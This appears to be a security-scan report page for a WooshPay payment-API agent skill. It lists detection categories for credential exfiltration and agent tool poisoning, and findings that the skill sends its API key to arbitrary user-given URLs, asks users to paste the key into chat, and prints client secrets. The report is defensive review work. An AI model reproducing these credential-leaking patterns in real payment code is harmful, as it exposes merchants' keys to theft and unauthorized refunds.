ClawHub

wooshpay-api

Security checks across malware telemetry and agentic risk

Overview

This WooshPay skill mostly matches its payment-management purpose, but it can expose a merchant API key through unsafe URL handling and poor secret guidance.

Review carefully before installing. Use only a restricted WooshPay key if possible, set it locally through an environment variable or secret manager, do not paste it into chat, do not pass full URLs to the order lookup script, and verify every payment or refund before confirming.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Taint TrackingDirect Taint Flow, Variable-Mediated Taint Flow, Credential Exfiltration Chain
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Findings (9)

Tainted flow: 'url' from input (line 70, user input) → requests.get (network output)

Medium
Category
Data Flow
Content
print(f"\n⏳ 正在查询订单 {order_id}...")
    
    try:
        response = requests.get(url, headers=headers, timeout=30)
        
        if response.status_code == 200:
            result = response.json()
Confidence
99% confidence
Finding
response = requests.get(url, headers=headers, timeout=30)

Tainted flow: 'headers' from os.environ.get (line 62, credential/environment) → requests.get (network output)

Critical
Category
Data Flow
Content
print(f"\n⏳ 正在查询订单 {order_id}...")
    
    try:
        response = requests.get(url, headers=headers, timeout=30)
        
        if response.status_code == 200:
            result = response.json()
Confidence
99% confidence
Finding
response = requests.get(url, headers=headers, timeout=30)

Lp3

Medium
Category
MCP Least Privilege
Confidence
91% confidence
Finding
The skill documentation indicates use of environment variables and outbound network access to a payment gateway, but no declared permissions are present. In an agent ecosystem, undeclared sensitive capabilities reduce transparency and can lead users or orchestrators to invoke a skill without understanding that it can access credentials and communicate with external systems handling financial operations.

Intent-Code Divergence

Medium
Confidence
99% confidence
Finding
The script explicitly tells users they can provide their API key 'directly in conversation,' which encourages disclosure of a secret through a chat interface rather than secure local configuration. In an agent setting, that can cause credential exposure to the assistant runtime, logs, transcripts, or downstream tooling that should never receive long-lived secrets.

Context-Inappropriate Capability

High
Confidence
99% confidence
Finding
This is a direct credential leakage flaw: the code accepts an arbitrary URL and unconditionally attaches the WooshPay API key in a Basic Authorization header. In the context of a payment gateway integration, compromise of this key can expose sensitive payment operations and account data, making the issue especially dangerous.

Missing User Warnings

Low
Confidence
84% confidence
Finding
The skill instructs users to export a live API key but does not warn that the credential is sensitive or advise against exposing it in logs, terminal history, screenshots, shared shells, or committed config files. Because this is a payment gateway key, accidental disclosure could enable unauthorized payment actions, order queries, or refunds depending on account scope.

Missing User Warnings

High
Confidence
96% confidence
Finding
The script prints client_secret directly to the console, exposing a sensitive payment token to anyone with terminal access, logs, transcripts, or command capture. In payment workflows, client secrets can be abused to continue or inspect payment flows and should be treated as confidential.

Missing User Warnings

High
Confidence
99% confidence
Finding
Allowing arbitrary URL input for lookup while silently sending the Authorization header creates a high-risk exfiltration path. The absence of any warning or confirmation increases the likelihood of accidental or social-engineering-driven disclosure of the WooshPay API key.

Ssd 3

High
Confidence
99% confidence
Finding
Instructing users to disclose an API key to the assistant is a direct secret-handling anti-pattern. Because this skill is explicitly meant to operate with a privileged payment API credential, the guidance materially increases the chance of credential leakage and unauthorized payment or refund operations if the secret is later exposed.

VirusTotal

64/64 vendors flagged this skill as clean.

View on VirusTotal